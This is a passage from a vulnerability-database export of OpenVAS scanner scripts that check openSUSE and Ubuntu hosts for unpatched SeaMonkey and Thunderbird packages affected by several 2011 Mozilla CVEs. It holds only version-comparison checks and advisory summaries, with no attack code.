b:\"9.0\")<0) {\n txt += 'Package thunderbird version ' + bver + ' is installed which is known to be vulnerable.\\n';\n vuln = TRUE;\n}\n\nif(vuln) {\n security_message(data:txt);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:42:06", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2012-08-02T00:00:00", "id": "OPENVAS:1361412562310850274", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850274", "type": "openvas", "title": "openSUSE: Security Advisory for seamonkey (openSUSE-SU-2012:0007-1)", "sourceData": "# Copyright (C) 2012 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850274\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-08-02 23:16:49 +0530 (Thu, 02 Aug 2012)\");\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0007-1\");\n script_name(\"openSUSE: Security Advisory for seamonkey (openSUSE-SU-2012:0007-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'seamonkey'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE11\\.4|openSUSE11\\.3)\");\n\n script_tag(name:\"affected\", value:\"seamonkey on openSUSE 11.4, openSUSE 11.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"insight\", value:\"seamonkey version 2.6 fixes several security issues:\n\n * MFSA 2011-53/CVE-2011-3660: Miscellaneous memory safety hazards\n\n * MFSA 2011-54/CVE-2011-3661: Potentially exploitable crash in the\n YARR regular expression library\n\n * MFSA 2011-55/CVE-2011-3658: nsSVGValue out-of-bounds access\n\n * MFSA 2011-56/CVE-2011-3663: Key detection without JavaScript via\n SVG animation\n\n * MFSA 2011-58/CVE-2011-3665: Crash scaling to extreme sizes\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~2.6~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~2.6~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-irc\", rpm:\"seamonkey-irc~2.6~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-translations-common\", rpm:\"seamonkey-translations-common~2.6~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-translations-other\", rpm:\"seamonkey-translations-other~2.6~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-venkman\", rpm:\"seamonkey-venkman~2.6~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSE11.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~2.6~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~2.6~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-irc\", rpm:\"seamonkey-irc~2.6~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-translations-common\", rpm:\"seamonkey-translations-common~2.6~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-translations-other\", rpm:\"seamonkey-translations-other~2.6~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-venkman\", rpm:\"seamonkey-venkman~2.6~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:39:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1343-1", "modified": "2019-03-13T00:00:00", "published": "2012-03-16T00:00:00", "id": "OPENVAS:1361412562310840939", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310840939", "type": "openvas", "title": "Ubuntu Update for thunderbird USN-1343-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1343_1.nasl 14132 2019-03-13 09:25:59Z cfischer $\n#\n# Ubuntu Update for thunderbird USN-1343-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-1343-1/\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.840939\");\n script_version(\"$Revision: 14132 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 10:25:59 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-16 10:51:11 +0530 (Fri, 16 Mar 2012)\");\n script_cve_id(\"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3658\", \"CVE-2011-3663\",\n \"CVE-2011-3665\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"USN\", value:\"1343-1\");\n script_name(\"Ubuntu Update for thunderbird USN-1343-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU11\\.10\");\n script_tag(name:\"summary\", value:\"Ubuntu Update for Linux kernel vulnerabilities USN-1343-1\");\n script_tag(name:\"affected\", value:\"thunderbird on Ubuntu 11.10\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n script_tag(name:\"insight\", value:\"Alexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian Holler,\n David Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse Ruderman, Marcia\n Knous, and Rober Longson discovered several memory safety issues which\n could possibly be exploited to crash Thunderbird or execute arbitrary code\n as the user that invoked Thunderbird. (CVE-2011-3660)\n\n Aki Helin discovered a crash in the YARR regular expression library that\n could be triggered by javascript in web content. (CVE-2011-3661)\n\n It was discovered that a flaw in the Mozilla SVG implementation could\n result in an out-of-bounds memory access if SVG elements were removed\n during a DOMAttrModified event handler. An attacker could potentially\n exploit this vulnerability to crash Thunderbird. (CVE-2011-3658)\n\n Mario Heiderich discovered it was possible to use SVG animation accessKey\n events to detect key strokes even when JavaScript was disabled. A malicious\n web page could potentially exploit this to trick a user into interacting\n with a prompt thinking it came from Thunderbird in a context where the user\n believed scripting was disabled. (CVE-2011-3663)\n\n It was discovered that it was possible to crash Thunderbird when scaling an\n OGG <video> element to extreme sizes. (CVE-2011-3665)\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"9.0+build2-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-01-31T18:41:49", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2012-08-02T00:00:00", "id": "OPENVAS:1361412562310850246", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310850246", "type": "openvas", "title": "openSUSE: Security Advisory for seamonkey (openSUSE-SU-2012:0039-1)", "sourceData": "# Copyright (C) 2012 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.850246\");\n script_version(\"2020-01-31T08:23:39+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-31 08:23:39 +0000 (Fri, 31 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2012-08-02 22:40:52 +0530 (Thu, 02 Aug 2012)\");\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"openSUSE-SU\", value:\"2012:0039-1\");\n script_name(\"openSUSE: Security Advisory for seamonkey (openSUSE-SU-2012:0039-1)\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'seamonkey'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\", re:\"ssh/login/release=(openSUSE11\\.4|openSUSE11\\.3)\");\n\n script_tag(name:\"affected\", value:\"seamonkey on openSUSE 11.4, openSUSE 11.3\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"insight\", value:\"seamonkey version 2.6 fixes several security issues:\n\n * MFSA 2011-53/CVE-2011-3660: Miscellaneous memory safety\n hazards\n\n * MFSA 2011-54/CVE-2011-3661: Potentially exploitable crash\n in the YARR regular expression library\n\n * MFSA 2011-55/CVE-2011-3658: nsSVGValue out-of-bounds\n access\n\n * MFSA 2011-56/CVE-2011-3663: Key detection without JavaScript\n via SVG animation\n\n * MFSA 2011-58/CVE-2011-3665: Crash scaling to extreme sizes\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"openSUSE11.4\") {\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~2.6~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~2.6~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-irc\", rpm:\"seamonkey-irc~2.6~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-translations-common\", rpm:\"seamonkey-translations-common~2.6~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-translations-other\", rpm:\"seamonkey-translations-other~2.6~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-venkman\", rpm:\"seamonkey-venkman~2.6~0.2.1\", rls:\"openSUSE11.4\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nif(release == \"openSUSE11.3\") {\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~2.6~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~2.6~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-irc\", rpm:\"seamonkey-irc~2.6~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-translations-common\", rpm:\"seamonkey-translations-common~2.6~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-translations-other\", rpm:\"seamonkey-translations-other~2.6~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(!isnull(res = isrpmvuln(pkg:\"seamonkey-venkman\", rpm:\"seamonkey-venkman~2.6~0.2.1\", rls:\"openSUSE11.3\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if(__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2017-12-04T11:20:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1343-1", "modified": "2017-12-01T00:00:00", "published": "2012-03-16T00:00:00", "id": "OPENVAS:840939", "href": "http://plugins.openvas.org/nasl.php?oid=840939", "type": "openvas", "title": "Ubuntu Update for thunderbird USN-1343-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1343_1.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for thunderbird USN-1343-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Alexandre Poirot, Chris Blizzard, Kyle Huey, Scoobidiver, Christian Holler,\n David Baron, Gary Kwong, Jim Blandy, Bob Clary, Jesse Ruderman, Marcia\n Knous, and Rober Longson discovered several memory safety issues which\n could possibly be exploited to crash Thunderbird or execute arbitrary code\n as the user that invoked Thunderbird. (CVE-2011-3660)\n\n Aki Helin discovered a crash in the YARR regular expression library that\n could be triggered by javascript in web content. (CVE-2011-3661)\n\n It was discovered that a flaw in the Mozilla SVG implementation could\n result in an out-of-bounds memory access if SVG elements were removed\n during a DOMAttrModified event handler. An attacker could potentially\n exploit this vulnerability to crash Thunderbird. (CVE-2011-3658)\n\n Mario Heiderich discovered it was possible to use SVG animation accessKey\n events to detect key strokes even when JavaScript was disabled. A malicious\n web page could potentially exploit this to trick a user into interacting\n with a prompt thinking it came from Thunderbird in a context where the user\n believed scripting was disabled. (CVE-2011-3663)\n\n It was discovered that it was possible to crash Thunderbird when scaling an\n OGG <video> element to extreme sizes. (CVE-2011-3665)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-1343-1\";\ntag_affected = \"thunderbird on Ubuntu 11.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1343-1/\");\n script_id(840939);\n script_version(\"$Revision: 7960 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 07:58:16 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-03-16 10:51:11 +0530 (Fri, 16 Mar 2012)\");\n script_cve_id(\"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3658\", \"CVE-2011-3663\",\n \"CVE-2011-3665\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1343-1\");\n script_name(\"Ubuntu Update for thunderbird USN-1343-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"thunderbird\", ver:\"9.0+build2-0ubuntu0.11.10.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-02T10:57:10", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "Check for the Version of seamonkey", "modified": "2017-12-28T00:00:00", "published": "2012-08-02T00:00:00", "id": "OPENVAS:850274", "href": "http://plugins.openvas.org/nasl.php?oid=850274", "type": "openvas", "title": "SuSE Update for seamonkey openSUSE-SU-2012:0007-1 (seamonkey)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_suse_2012_0007_1.nasl 8253 2017-12-28 06:29:51Z teissa $\n#\n# SuSE Update for seamonkey openSUSE-SU-2012:0007-1 (seamonkey)\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"seamonkey version 2.6 fixes several security issues:\n\n * MFSA 2011-53/CVE-2011-3660: Miscellaneous memory safety hazards\n * MFSA 2011-54/CVE-2011-3661: Potentially exploitable crash in the\n YARR regular expression library\n * MFSA 2011-55/CVE-2011-3658: nsSVGValue out-of-bounds access\n * MFSA 2011-56/CVE-2011-3663: Key detection without JavaScript via\n SVG animation\n * MFSA 2011-58/CVE-2011-3665: Crash scaling to extreme sizes\";\n\ntag_affected = \"seamonkey on openSUSE 11.4, openSUSE 11.3\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_id(850274);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-08-02 23:16:49 +0530 (Thu, 02 Aug 2012)\");\n script_cve_id(\"CVE-2011-3658\", \"CVE-2011-3660\", \"CVE-2011-3661\", \"CVE-2011-3663\", \"CVE-2011-3665\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"openSUSE-SU\", value: \"2012:0007_1\");\n script_name(\"SuSE Update for seamonkey openSUSE-SU-2012:0007-1 (seamonkey)\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of seamonkey\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"SuSE Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/suse\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"openSUSE11.4\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~2.6~0.2.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~2.6~0.2.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-irc\", rpm:\"seamonkey-irc~2.6~0.2.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-translations-common\", rpm:\"seamonkey-translations-common~2.6~0.2.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-translations-other\", rpm:\"seamonkey-translations-other~2.6~0.2.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-venkman\", rpm:\"seamonkey-venkman~2.6~0.2.1\", rls:\"openSUSE11.4\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"openSUSE11.3\")\n{\n\n if ((res = isrpmvuln(pkg:\"seamonkey\", rpm:\"seamonkey~2.6~0.2.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-dom-inspector\", rpm:\"seamonkey-dom-inspector~2.6~0.2.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-irc\", rpm:\"seamonkey-irc~2.6~0.2.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-translations-common\", rpm:\"seamonkey-translations-common~2.6~0.2.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-translations-other\", rpm:\"seamonkey-translations-other~2.6~0.2.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"seamonkey-venkman\", rpm:\"seamonkey-venkman~2.6~0.2.1\", rls:\"openSUSE11.3\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-04T11:20:39", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3663", "CVE-2011-3661", "CVE-2011-3660", "CVE-2011-3658", "CVE-2011-3665"], "description": "Ubuntu Update for Linux kernel vulnerabilities USN-1306-2", "modified": "2017-12-01T00:00:00", "published": "2012-01-09T00:00:00", "id": "OPENVAS:840859", "href": "http://plugins.openvas.org/nasl.php?oid=840859", "type": "openvas", "title": "Ubuntu Update for mozvoikko USN-1306-2", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1306_2.nasl 7960 2017-12-01 06:58:16Z santu $\n#\n# Ubuntu Update for mozvoikko USN-1306-2\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 